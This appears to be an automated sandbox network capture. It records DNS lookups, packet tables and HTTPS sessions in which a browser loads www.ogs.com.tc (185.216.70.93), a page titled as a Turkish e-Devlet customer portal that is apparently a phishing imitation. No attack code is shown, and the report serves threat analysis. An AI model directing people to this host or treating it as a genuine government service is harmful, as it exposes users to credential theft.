May 26, 2024 00:17:22.555546045 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.555558920 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.555573940 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.555600882 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.561745882 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.561810017 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.561841011 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.561912060 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.561974049 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.598999977 CEST	443	49791	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.599033117 CEST	443	49791	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.599054098 CEST	443	49791	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.599144936 CEST	49791	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.599178076 CEST	443	49791	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.599241972 CEST	49791	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.604022026 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.604058027 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.612493992 CEST	443	49791	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.612515926 CEST	443	49791	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.612566948 CEST	49791	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.612593889 CEST	443	49791	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.612617970 CEST	49791	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.649643898 CEST	443	49791	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.649741888 CEST	443	49791	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.649740934 CEST	49791	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.649804115 CEST	49791	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.650437117 CEST	49791	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.650458097 CEST	443	49791	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.667897940 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.667943954 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.668160915 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.668231010 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.668246031 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.047350883 CEST	443	49794	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.047683954 CEST	49794	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.047702074 CEST	443	49794	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.048213005 CEST	443	49794	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.048876047 CEST	49794	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.048939943 CEST	443	49794	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.053395033 CEST	49794	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.060004950 CEST	443	49795	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.060370922 CEST	49795	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.060376883 CEST	443	49795	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.060920000 CEST	443	49795	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.061469078 CEST	49795	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.061533928 CEST	443	49795	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.061678886 CEST	49795	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.094491005 CEST	443	49794	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.106486082 CEST	443	49795	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.200136900 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.200524092 CEST	49797	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.200558901 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.202018023 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.202367067 CEST	49797	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.202740908 CEST	49797	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.202814102 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.202840090 CEST	49797	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.205490112 CEST	443	49798	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.205934048 CEST	49798	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.205941916 CEST	443	49798	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.207679987 CEST	443	49798	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.207874060 CEST	49798	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.208344936 CEST	49798	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.208344936 CEST	49798	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.208997965 CEST	443	49798	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.213009119 CEST	443	49796	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.214121103 CEST	49796	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.214128971 CEST	443	49796	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.215488911 CEST	443	49796	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.215676069 CEST	49796	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.216130972 CEST	49796	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.216180086 CEST	443	49796	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.218276024 CEST	49796	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.218282938 CEST	443	49796	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.246493101 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.308665991 CEST	49796	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.383119106 CEST	443	49794	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.383157969 CEST	443	49794	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.383315086 CEST	49794	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.383318901 CEST	443	49794	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.383450985 CEST	49794	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.385150909 CEST	49794	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.385163069 CEST	443	49794	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.393695116 CEST	443	49795	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.393757105 CEST	443	49795	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.393908024 CEST	443	49795	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.393940926 CEST	49795	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.394006968 CEST	49795	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.394505024 CEST	49795	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.394509077 CEST	443	49795	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.410512924 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.410629034 CEST	49797	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.414520979 CEST	443	49798	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.414757967 CEST	49798	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.447135925 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.447391033 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.447418928 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.448649883 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.449131966 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.449342012 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.449342012 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.449470997 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.514303923 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.514334917 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.543725014 CEST	443	49798	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.543762922 CEST	443	49798	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.543771982 CEST	443	49798	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.543855906 CEST	443	49798	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.543901920 CEST	49798	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.545563936 CEST	49798	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.546255112 CEST	49798	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.546274900 CEST	443	49798	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.562076092 CEST	443	49796	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.562139034 CEST	443	49796	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.562160015 CEST	443	49796	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.562305927 CEST	443	49796	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.562361002 CEST	49796	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.562361002 CEST	49796	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.567042112 CEST	49796	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.568516970 CEST	49796	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.568557978 CEST	443	49796	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.644942045 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.644983053 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.644992113 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.645041943 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.645062923 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.645075083 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.645199060 CEST	49797	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.645241022 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.645267010 CEST	49797	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.645275116 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.645363092 CEST	49797	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.661689043 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.661704063 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.661745071 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.661756992 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.661775112 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.661789894 CEST	49797	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.661806107 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.661858082 CEST	49797	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.661947012 CEST	49797	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.666649103 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.666660070 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.666749954 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.666794062 CEST	49797	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.667615891 CEST	49797	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.667629957 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.667669058 CEST	49797	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.667968035 CEST	49797	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.698580980 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.922710896 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.922755003 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.922766924 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.922787905 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.922797918 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.922806978 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.922868013 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.922944069 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.922982931 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.923006058 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.923029900 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.949176073 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.949189901 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.949227095 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.949244022 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.949254036 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.949265003 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.949295044 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.949312925 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.949330091 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.949358940 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.974596024 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.974607944 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.974675894 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.974694014 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:23.974745035 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.974745035 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.975049973 CEST	49799	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:23.975087881 CEST	443	49799	185.216.70.93	192.168.2.4
May 26, 2024 00:17:24.694602966 CEST	443	49744	142.250.185.228	192.168.2.4
May 26, 2024 00:17:24.694664001 CEST	443	49744	142.250.185.228	192.168.2.4
May 26, 2024 00:17:24.694709063 CEST	49744	443	192.168.2.4	142.250.185.228
May 26, 2024 00:17:25.215497017 CEST	49744	443	192.168.2.4	142.250.185.228
May 26, 2024 00:17:25.215529919 CEST	443	49744	142.250.185.228	192.168.2.4
May 26, 2024 00:18:13.593010902 CEST	49808	443	192.168.2.4	142.250.185.228
May 26, 2024 00:18:13.593094110 CEST	443	49808	142.250.185.228	192.168.2.4
May 26, 2024 00:18:13.593178988 CEST	49808	443	192.168.2.4	142.250.185.228
May 26, 2024 00:18:13.593626022 CEST	49808	443	192.168.2.4	142.250.185.228
May 26, 2024 00:18:13.593666077 CEST	443	49808	142.250.185.228	192.168.2.4
May 26, 2024 00:18:14.263319016 CEST	443	49808	142.250.185.228	192.168.2.4
May 26, 2024 00:18:14.268500090 CEST	49808	443	192.168.2.4	142.250.185.228
May 26, 2024 00:18:14.268567085 CEST	443	49808	142.250.185.228	192.168.2.4
May 26, 2024 00:18:14.269052982 CEST	443	49808	142.250.185.228	192.168.2.4
May 26, 2024 00:18:14.269438028 CEST	49808	443	192.168.2.4	142.250.185.228
May 26, 2024 00:18:14.269530058 CEST	443	49808	142.250.185.228	192.168.2.4
May 26, 2024 00:18:14.324148893 CEST	49808	443	192.168.2.4	142.250.185.228
May 26, 2024 00:18:18.744838953 CEST	49723	80	192.168.2.4	93.184.221.240
May 26, 2024 00:18:18.744945049 CEST	49724	80	192.168.2.4	93.184.221.240
May 26, 2024 00:18:18.750592947 CEST	80	49723	93.184.221.240	192.168.2.4
May 26, 2024 00:18:18.750745058 CEST	49723	80	192.168.2.4	93.184.221.240
May 26, 2024 00:18:18.757204056 CEST	80	49724	93.184.221.240	192.168.2.4
May 26, 2024 00:18:18.757299900 CEST	49724	80	192.168.2.4	93.184.221.240
May 26, 2024 00:18:24.173747063 CEST	443	49808	142.250.185.228	192.168.2.4
May 26, 2024 00:18:24.173914909 CEST	443	49808	142.250.185.228	192.168.2.4
May 26, 2024 00:18:24.174112082 CEST	49808	443	192.168.2.4	142.250.185.228
May 26, 2024 00:18:26.044282913 CEST	49808	443	192.168.2.4	142.250.185.228
May 26, 2024 00:18:26.044317007 CEST	443	49808	142.250.185.228	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 26, 2024 00:17:09.410109043 CEST	53	59799	1.1.1.1	192.168.2.4
May 26, 2024 00:17:09.514344931 CEST	53	59202	1.1.1.1	192.168.2.4
May 26, 2024 00:17:10.564075947 CEST	53	52959	1.1.1.1	192.168.2.4
May 26, 2024 00:17:11.182811022 CEST	61234	53	192.168.2.4	1.1.1.1
May 26, 2024 00:17:11.182949066 CEST	63735	53	192.168.2.4	1.1.1.1
May 26, 2024 00:17:11.611787081 CEST	53	63735	1.1.1.1	192.168.2.4
May 26, 2024 00:17:12.211869955 CEST	63893	53	192.168.2.4	1.1.1.1
May 26, 2024 00:17:12.401566982 CEST	53	63893	1.1.1.1	192.168.2.4
May 26, 2024 00:17:13.551546097 CEST	54118	53	192.168.2.4	1.1.1.1
May 26, 2024 00:17:13.551683903 CEST	63447	53	192.168.2.4	1.1.1.1
May 26, 2024 00:17:13.603745937 CEST	53	54118	1.1.1.1	192.168.2.4
May 26, 2024 00:17:13.603790045 CEST	53	63447	1.1.1.1	192.168.2.4
May 26, 2024 00:17:14.199592113 CEST	53	57972	1.1.1.1	192.168.2.4
May 26, 2024 00:17:14.937891960 CEST	51090	53	192.168.2.4	1.1.1.1
May 26, 2024 00:17:14.938210011 CEST	55737	53	192.168.2.4	1.1.1.1
May 26, 2024 00:17:15.027987003 CEST	53	61234	1.1.1.1	192.168.2.4
May 26, 2024 00:17:15.195065975 CEST	53	53453	1.1.1.1	192.168.2.4
May 26, 2024 00:17:15.359090090 CEST	53	55737	1.1.1.1	192.168.2.4
May 26, 2024 00:17:15.948847055 CEST	65393	53	192.168.2.4	1.1.1.1
May 26, 2024 00:17:16.647449970 CEST	53	65393	1.1.1.1	192.168.2.4
May 26, 2024 00:17:17.542663097 CEST	53	51090	1.1.1.1	192.168.2.4
May 26, 2024 00:17:27.796716928 CEST	53	61121	1.1.1.1	192.168.2.4
May 26, 2024 00:17:30.475925922 CEST	138	138	192.168.2.4	192.168.2.255
May 26, 2024 00:17:46.734323978 CEST	53	49439	1.1.1.1	192.168.2.4
May 26, 2024 00:18:09.277793884 CEST	53	61778	1.1.1.1	192.168.2.4
May 26, 2024 00:18:09.277825117 CEST	53	63654	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 26, 2024 00:17:09.514533043 CEST	192.168.2.4	1.1.1.1	c233	(Port unreachable)	Destination Unreachable
May 26, 2024 00:17:15.028045893 CEST	192.168.2.4	1.1.1.1	c202	(Port unreachable)	Destination Unreachable
May 26, 2024 00:17:17.542767048 CEST	192.168.2.4	1.1.1.1	c202	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 26, 2024 00:17:11.182811022 CEST	192.168.2.4	1.1.1.1	0xa2c7	Standard query (0)	www.ogs.com.tc	A (IP address)	IN (0x0001)	false
May 26, 2024 00:17:11.182949066 CEST	192.168.2.4	1.1.1.1	0xa911	Standard query (0)	www.ogs.com.tc	65	IN (0x0001)	false
May 26, 2024 00:17:12.211869955 CEST	192.168.2.4	1.1.1.1	0x32cc	Standard query (0)	www.ogs.com.tc	A (IP address)	IN (0x0001)	false
May 26, 2024 00:17:13.551546097 CEST	192.168.2.4	1.1.1.1	0xe0	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 26, 2024 00:17:13.551683903 CEST	192.168.2.4	1.1.1.1	0x3e21	Standard query (0)	www.google.com	65	IN (0x0001)	false
May 26, 2024 00:17:14.937891960 CEST	192.168.2.4	1.1.1.1	0xb344	Standard query (0)	www.ogs.com.tc	A (IP address)	IN (0x0001)	false
May 26, 2024 00:17:14.938210011 CEST	192.168.2.4	1.1.1.1	0x161f	Standard query (0)	www.ogs.com.tc	65	IN (0x0001)	false
May 26, 2024 00:17:15.948847055 CEST	192.168.2.4	1.1.1.1	0x72e0	Standard query (0)	www.ogs.com.tc	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 26, 2024 00:17:11.611787081 CEST	1.1.1.1	192.168.2.4	0xa911	No error (0)	www.ogs.com.tc	ogs.com.tc		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 00:17:12.401566982 CEST	1.1.1.1	192.168.2.4	0x32cc	No error (0)	www.ogs.com.tc	ogs.com.tc		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 00:17:12.401566982 CEST	1.1.1.1	192.168.2.4	0x32cc	No error (0)	ogs.com.tc		185.216.70.93	A (IP address)	IN (0x0001)	false
May 26, 2024 00:17:13.603745937 CEST	1.1.1.1	192.168.2.4	0xe0	No error (0)	www.google.com		142.250.185.228	A (IP address)	IN (0x0001)	false
May 26, 2024 00:17:13.603790045 CEST	1.1.1.1	192.168.2.4	0x3e21	No error (0)	www.google.com			65	IN (0x0001)	false
May 26, 2024 00:17:15.027987003 CEST	1.1.1.1	192.168.2.4	0xa2c7	No error (0)	www.ogs.com.tc	ogs.com.tc		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 00:17:15.027987003 CEST	1.1.1.1	192.168.2.4	0xa2c7	No error (0)	ogs.com.tc		185.216.70.93	A (IP address)	IN (0x0001)	false
May 26, 2024 00:17:15.359090090 CEST	1.1.1.1	192.168.2.4	0x161f	No error (0)	www.ogs.com.tc	ogs.com.tc		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 00:17:16.647449970 CEST	1.1.1.1	192.168.2.4	0x72e0	No error (0)	www.ogs.com.tc	ogs.com.tc		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 00:17:16.647449970 CEST	1.1.1.1	192.168.2.4	0x72e0	No error (0)	ogs.com.tc		185.216.70.93	A (IP address)	IN (0x0001)	false
May 26, 2024 00:17:17.542663097 CEST	1.1.1.1	192.168.2.4	0xb344	No error (0)	www.ogs.com.tc	ogs.com.tc		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 00:17:17.542663097 CEST	1.1.1.1	192.168.2.4	0xb344	No error (0)	ogs.com.tc		185.216.70.93	A (IP address)	IN (0x0001)	false
May 26, 2024 00:17:24.077275991 CEST	1.1.1.1	192.168.2.4	0x4507	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
May 26, 2024 00:17:24.077275991 CEST	1.1.1.1	192.168.2.4	0x4507	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
May 26, 2024 00:17:25.223181963 CEST	1.1.1.1	192.168.2.4	0x6636	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 00:17:25.223181963 CEST	1.1.1.1	192.168.2.4	0x6636	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
May 26, 2024 00:17:37.941577911 CEST	1.1.1.1	192.168.2.4	0x5797	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 00:17:37.941577911 CEST	1.1.1.1	192.168.2.4	0x5797	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
May 26, 2024 00:18:02.024049044 CEST	1.1.1.1	192.168.2.4	0x633e	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 00:18:02.024049044 CEST	1.1.1.1	192.168.2.4	0x633e	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
May 26, 2024 00:18:24.099172115 CEST	1.1.1.1	192.168.2.4	0xfd7a	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 00:18:24.099172115 CEST	1.1.1.1	192.168.2.4	0xfd7a	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.ogs.com.tc

https:

fs.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:13 UTC	657	OUT	GET / HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:13 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:13 GMT Content-Type: text/html Content-Length: 10068 Last-Modified: Thu, 23 May 2024 21:26:52 GMT Connection: close ETag: "664fb49c-2754" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:13 UTC	10068	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d c3 bc c5 9f 74 65 72 69 20 50 6f 72 74 61 6c c4 b1 20 7c 20 65 2d 44 65 76 6c 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c Data Ascii: <!DOCTYPE html><html lang="tr"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Mteri Portal \| e-Devlet</title> <l

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:13 UTC	547	OUT	GET /assets/css/style.css HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
